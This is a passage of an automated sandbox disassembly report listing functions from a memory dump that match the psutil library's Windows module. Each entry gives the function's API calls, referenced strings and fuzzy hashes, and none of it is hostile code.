Instruction ID: 975c16f4b383a53714ff4fe12b73c3076a8b09f8b077a9ca0570df7f073c0f46
Opcode Fuzzy Hash: 5db063c69b56fa29c44e9e9f56adae1de52bf740f7b2cf0a61671514e64b58fa
Instruction Fuzzy Hash: 08F082A1F0CA46C1EB64DB37E8040382770BF4DB84B846031C98D43768FF2CE5098380

Function 00007FFB9DD688C3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22memoryserviceCOMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD688F9
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6890A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68910
HeapFree.KERNEL32 ref: 00007FFB9DD6891E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6892C
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68932
HeapFree.KERNEL32 ref: 00007FFB9DD68940

Strings

pause_pending, xrefs: 00007FFB9DD688C3
(sk), xrefs: 00007FFB9DD688F2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$CloseFreeHandleProcessService$BuildValue
String ID: (sk)$pause_pending
API String ID: 127882022-461645825
Opcode ID: 6569a5fb80fdf4246656b6a0a3083e6316541fcc9ef978573a0fd2d353914650
Instruction ID: 127fe043a0ef9d0663bca9527deb2bc8121a9fb5348d98df89c5cbd1183c92a9
Opcode Fuzzy Hash: 6569a5fb80fdf4246656b6a0a3083e6316541fcc9ef978573a0fd2d353914650
Instruction Fuzzy Hash: 88F012A1F1CA4681EB64DB37E8141796771BF4DB85B856031C98D43768FF2CE5058780

Function 00007FFB9DD688CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22memoryserviceCOMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD688F9
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6890A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68910
HeapFree.KERNEL32 ref: 00007FFB9DD6891E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6892C
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68932
HeapFree.KERNEL32 ref: 00007FFB9DD68940

Strings

(sk), xrefs: 00007FFB9DD688F2
continue_pending, xrefs: 00007FFB9DD688CC

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$CloseFreeHandleProcessService$BuildValue
String ID: (sk)$continue_pending
API String ID: 127882022-3850771874
Opcode ID: f5b54f98e23f67648d58909bc3842abce9f1181e0c3c58ee82413d557b5661bf
Instruction ID: b2048344f8e8a8c4f796a8b473e5e3d962ea36dda2bd35144c946f2b316c99a1
Opcode Fuzzy Hash: f5b54f98e23f67648d58909bc3842abce9f1181e0c3c58ee82413d557b5661bf
Instruction Fuzzy Hash: 36F012A1F1CA46C1EB64DB77E8141796771BF8DB85B856031C98D43768FF2CE5058780

Function 00007FFB9DD688D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22memoryserviceCOMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD688F9
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6890A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68910
HeapFree.KERNEL32 ref: 00007FFB9DD6891E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6892C
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68932
HeapFree.KERNEL32 ref: 00007FFB9DD68940

Strings

stop_pending, xrefs: 00007FFB9DD688D5
(sk), xrefs: 00007FFB9DD688F2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$CloseFreeHandleProcessService$BuildValue
String ID: (sk)$stop_pending
API String ID: 127882022-1930585124
Opcode ID: 48f86efe3eea410b85b2a7612cc24c2edae087b508ce7f4e73f4fa34bf76e174
Instruction ID: e9933dd6d5d29fe75f64026d189995e2ac20e7d8ec60082c8f1698eab39591d7
Opcode Fuzzy Hash: 48f86efe3eea410b85b2a7612cc24c2edae087b508ce7f4e73f4fa34bf76e174
Instruction Fuzzy Hash: 02F012A1F1CA46C1EB64DB37E8141796771BF4DB85B856031D98D43768FF2CE5058780

Function 00007FFB9DD688A8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22memoryserviceCOMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD688F9
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6890A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68910
HeapFree.KERNEL32 ref: 00007FFB9DD6891E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6892C
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68932
HeapFree.KERNEL32 ref: 00007FFB9DD68940

Strings

running, xrefs: 00007FFB9DD688A8
(sk), xrefs: 00007FFB9DD688F2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$CloseFreeHandleProcessService$BuildValue
String ID: (sk)$running
API String ID: 127882022-3389828697
Opcode ID: f785410bd87a35ba491306b7248f3a34a7798fdefaf4be69f0a0ea21f0ef00e7
Instruction ID: c0ffe22838281fcc1370385512a22c5f76284bb09d2cd21622ceb333265ac703
Opcode Fuzzy Hash: f785410bd87a35ba491306b7248f3a34a7798fdefaf4be69f0a0ea21f0ef00e7
Instruction Fuzzy Hash: 76F012A1F1CA4681EB64DB37F8141796771BF4DB85B856031C98D53768FF2CE5058780

Function 00007FFB9DD688B1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22memoryserviceCOMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD688F9
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6890A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68910
HeapFree.KERNEL32 ref: 00007FFB9DD6891E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6892C
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68932
HeapFree.KERNEL32 ref: 00007FFB9DD68940

Strings

(sk), xrefs: 00007FFB9DD688F2
paused, xrefs: 00007FFB9DD688B1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$CloseFreeHandleProcessService$BuildValue
String ID: (sk)$paused
API String ID: 127882022-3190322518
Opcode ID: 63c88c9a13255999429cdf99a6b252f25d9fc8e75c259dd895562b4c4768fcf9
Instruction ID: e0cd7ed5f060a7b707406a690ac9a13b1950c2d3b1af68ba46434f4b1e57834c
Opcode Fuzzy Hash: 63c88c9a13255999429cdf99a6b252f25d9fc8e75c259dd895562b4c4768fcf9
Instruction Fuzzy Hash: A9F05EA1F0DA4681EA649B37E8040382770BF4DB84B846031C98D43768FE2CE5058380

Function 00007FFB9DD688BA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22memoryserviceCOMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD688F9
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6890A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68910
HeapFree.KERNEL32 ref: 00007FFB9DD6891E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6892C
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68932
HeapFree.KERNEL32 ref: 00007FFB9DD68940

Strings

start_pending, xrefs: 00007FFB9DD688BA
(sk), xrefs: 00007FFB9DD688F2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$CloseFreeHandleProcessService$BuildValue
String ID: (sk)$start_pending
API String ID: 127882022-2023969894
Opcode ID: 3409c6bf8413084592234efc0b6f05165945dfd4648dc3389cbf111fa97df631
Instruction ID: ac09f4ca4732bf68c2cf790e626b6aae9608a02a496ed7f87d98506ee4de45f8
Opcode Fuzzy Hash: 3409c6bf8413084592234efc0b6f05165945dfd4648dc3389cbf111fa97df631
Instruction Fuzzy Hash: D8F082A1F0CA4681EB34DB37E8040382770BF4DB84B846031C98D43768FF2CE5058380

Function 00007FFB9DD67840 Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD641AA), ref: 00007FFB9DD6786E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD641AA), ref: 00007FFB9DD6787D
EnumProcesses.PSAPI(?,?,?,00007FFB9DD641AA), ref: 00007FFB9DD67895
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD641AA), ref: 00007FFB9DD678BD
PyErr_SetFromWindowsErr.PYTHON3(?,?,?,00007FFB9DD641AA), ref: 00007FFB9DD678C5

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: free$EnumErr_FromProcessesWindowsmalloc
String ID:
API String ID: 4169093983-0
Opcode ID: a8e820127fe32a98a06e698bbe51d4dc5589f7603ff49f3144bf73a0fa82df76
Instruction ID: 734c13bdf729072af31d7aaea2c66374740af39d79019600e6b5378a652e6406
Opcode Fuzzy Hash: a8e820127fe32a98a06e698bbe51d4dc5589f7603ff49f3144bf73a0fa82df76
Instruction Fuzzy Hash: B7115465B08B4682EB648F73E84413963A1FF8CB81F992035DA8E43B54EE3CD445C780

Function 00007FFB9DD673B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD673CC
Py_BuildValue.PYTHON3 ref: 00007FFB9DD67462

Part of subcall function 00007FFB9DD67D20: OpenProcess.KERNEL32(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D36
Part of subcall function 00007FFB9DD67D20: CloseHandle.KERNEL32(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D53

PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD6742F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD67445

Part of subcall function 00007FFB9DD610E0: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD6112B
Part of subcall function 00007FFB9DD610E0: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD61141
Part of subcall function 00007FFB9DD610E0: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD61155

Strings

psutil_pid_is_running -> 0, xrefs: 00007FFB9DD673EF

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Arg_BuildCallCharCloseDeallocErr_FromFunctionHandleObjectObject_OpenParseProcessTupleUnicode_ValueWidefree
String ID: psutil_pid_is_running -> 0
API String ID: 3303866948-3467909595
Opcode ID: b1211986340a1a8d6553256a51705bfebbaa19623a3658dbd2f4065f9b9c4a43
Instruction ID: 28a5a7c1c875b3ea8b59afa48363eead0e06d1f0701de45b1f3fe26b29fa0e25
Opcode Fuzzy Hash: b1211986340a1a8d6553256a51705bfebbaa19623a3658dbd2f4065f9b9c4a43
Instruction Fuzzy Hash: 121187A5B0C94691E7608B76F4442B9A754FF887E4FC01131D9DD46AA8FE6CE085C780

Function 00007FFB9DD61180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

assume access denied (originated from %s), xrefs: 00007FFB9DD6119E
(is), xrefs: 00007FFB9DD611C1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CallDeallocErr_FunctionObjectObject___stdio_common_vsprintf
String ID: (is)$assume access denied (originated from %s)
API String ID: 1805293726-3664638754
Opcode ID: 9853c6a794e0137e1bb3e1def5103ace5b3eed4e547d625723e678b78dc0ba75
Instruction ID: 0b322a4b5944eddcd577156502616e85f9a2dcc7ab3c9737b00acfef732de682
Opcode Fuzzy Hash: 9853c6a794e0137e1bb3e1def5103ace5b3eed4e547d625723e678b78dc0ba75
Instruction Fuzzy Hash: 9701DEE1B1894685EE709B36E8513B523A0FF9CB88FC56032CACD87665FE2CE105C784

Function 00007FFB9DD610E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD6112B
PyErr_SetObject.PYTHON3 ref: 00007FFB9DD61141
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD61155

Strings

assume no such process (originated from %s), xrefs: 00007FFB9DD610FE
(is), xrefs: 00007FFB9DD61121

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CallDeallocErr_FunctionObjectObject___stdio_common_vsprintf
String ID: (is)$assume no such process (originated from %s)
API String ID: 1805293726-1293061785
Opcode ID: 26ab91be43b2a3e59a0fbe3e3e2fb82c101a47abf5a359ff4e6a485339fad67f
Instruction ID: 369fe73e927b2589bb1e7211d741e863030951ed6d7f9f2848b541b7a09ef51b
Opcode Fuzzy Hash: 26ab91be43b2a3e59a0fbe3e3e2fb82c101a47abf5a359ff4e6a485339fad67f
Instruction Fuzzy Hash: 8C01D2E1B18D4681EE709B32E85137523A0BF9CB84FC56031DA8D47765FE2CD1058784

Function 00007FFB9DD67590 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD675AD

Part of subcall function 00007FFB9DD67480: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674A9
Part of subcall function 00007FFB9DD67480: NtQuerySystemInformation.NTDLL ref: 00007FFB9DD674D2
Part of subcall function 00007FFB9DD67480: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674E9
Part of subcall function 00007FFB9DD67480: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674F3
Part of subcall function 00007FFB9DD67480: PyErr_NoMemory.PYTHON3(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD67501

Py_BuildValue.PYTHON3 ref: 00007FFB9DD67809
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6781A

Strings

kkdddkKKKKKKkKKKKKKKKK, xrefs: 00007FFB9DD67718

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: freemalloc$Arg_BuildErr_InformationMemoryParseQuerySystemTupleValue
String ID: kkdddkKKKKKKkKKKKKKKKK
API String ID: 1531563548-3509479964
Opcode ID: 8eebb1f5d12c4faa77203241ed821083cd36b6e045d6fbd6cc5eb7373a20538e
Instruction ID: 7637b981128aad82a29ca7ba60317f9648df08c37ef44e97e80347b7af7dacc4
Opcode Fuzzy Hash: 8eebb1f5d12c4faa77203241ed821083cd36b6e045d6fbd6cc5eb7373a20538e
Instruction Fuzzy Hash: 31618176715F898ACA61CB2AE444B99B3A5FF4C780F419231DA8D53B14FF39D045CB40

Function 00007FFB9DD67CA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(?,?,?,00007FFB9DD642A3), ref: 00007FFB9DD67CCB
GetLastError.KERNEL32(?,?,?,00007FFB9DD642A3), ref: 00007FFB9DD67CD9

Strings

automatically set for PID 0, xrefs: 00007FFB9DD67CAE
OpenProcess, xrefs: 00007FFB9DD67CE4

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: ErrorLastOpenProcess
String ID: OpenProcess$automatically set for PID 0
API String ID: 919517065-2746090705
Opcode ID: 795b65efe8bf69edf0fd8c56656d73d7c7458d79a4e1795ab922128e35fd15f7
Instruction ID: 2cbbad286d44fb6e5693552df604444378d696040942b924b821d2b49b3720d9
Opcode Fuzzy Hash: 795b65efe8bf69edf0fd8c56656d73d7c7458d79a4e1795ab922128e35fd15f7
Instruction Fuzzy Hash: 85F09690F2A94692EB748777D89003952D1AF5C794FC53035D98EC7BA4FE2CE8D18780

Function 00007FFB9DD68070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetSystemPowerStatus.KERNEL32 ref: 00007FFB9DD68088
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD68094
Py_BuildValue.PYTHON3 ref: 00007FFB9DD680CE

Strings

iiiI, xrefs: 00007FFB9DD680B2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: BuildErr_FromPowerStatusSystemValueWindows
String ID: iiiI
API String ID: 2045901803-2605956832
Opcode ID: 88ffeaee8c873da0def5642056156eed6d51202adf4f3f870475aa5b58be7c57
Instruction ID: 1b6a99206ec8dc3ebfb663eb757b18ad01a956819581dca971db4c83daf21f44
Opcode Fuzzy Hash: 88ffeaee8c873da0def5642056156eed6d51202adf4f3f870475aa5b58be7c57
Instruction Fuzzy Hash: D9F031A1B2C98182EBA0AB32E81116A77A0FF9D704FC02035E6CE42655FE2CD1058B40

Function 00007FFB9DB3C9AC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFB9DB3C9D8
GetCurrentThreadId.KERNEL32 ref: 00007FFB9DB3C9E6
GetCurrentProcessId.KERNEL32 ref: 00007FFB9DB3C9F2
QueryPerformanceCounter.KERNEL32 ref: 00007FFB9DB3CA02

Memory Dump Source

Source File: 00000010.00000002.2218079540.00007FFB9D871000.00000020.00000001.01000000.00000042.sdmp, Offset: 00007FFB9D870000, based on PE: true

Associated: 00000010.00000002.2218021280.00007FFB9D870000.00000002.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218346156.00007FFB9DB3E000.00000002.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218479944.00007FFB9DC8B000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218528926.00007FFB9DC9B000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218564241.00007FFB9DCA1000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218601582.00007FFB9DCA6000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218641875.00007FFB9DCB5000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218677726.00007FFB9DCBC000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218724327.00007FFB9DCBD000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218760642.00007FFB9DCBE000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218796663.00007FFB9DCBF000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218869059.00007FFB9DCD8000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218913021.00007FFB9DCE7000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2218958553.00007FFB9DCF7000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2219159704.00007FFB9DCF8000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2219322330.00007FFB9DCF9000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2219386831.00007FFB9DCFA000.00000008.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2219500227.00007FFB9DCFD000.00000004.00000001.01000000.00000042.sdmpDownload File
Associated: 00000010.00000002.2219990517.00007FFB9DCFF000.00000002.00000001.01000000.00000042.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9d870000_check.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
Instruction ID: 145dd920b89a5d60bdd08783b640b83d20edde591931db7ac83b1c611cce2475
Opcode Fuzzy Hash: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
Instruction Fuzzy Hash: 25114866B16F018AEB10CF75E8452A833A4FB1C758F440E35EAAD42BA4EF38D1598740

Function 00007FFB9DD67D20 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D36
PyErr_Clear.PYTHON3(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D6C

Part of subcall function 00007FFB9DD67A40: GetLastError.KERNEL32(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67A5D

CloseHandle.KERNEL32(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D53
CloseHandle.KERNEL32(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D66

Memory Dump Source

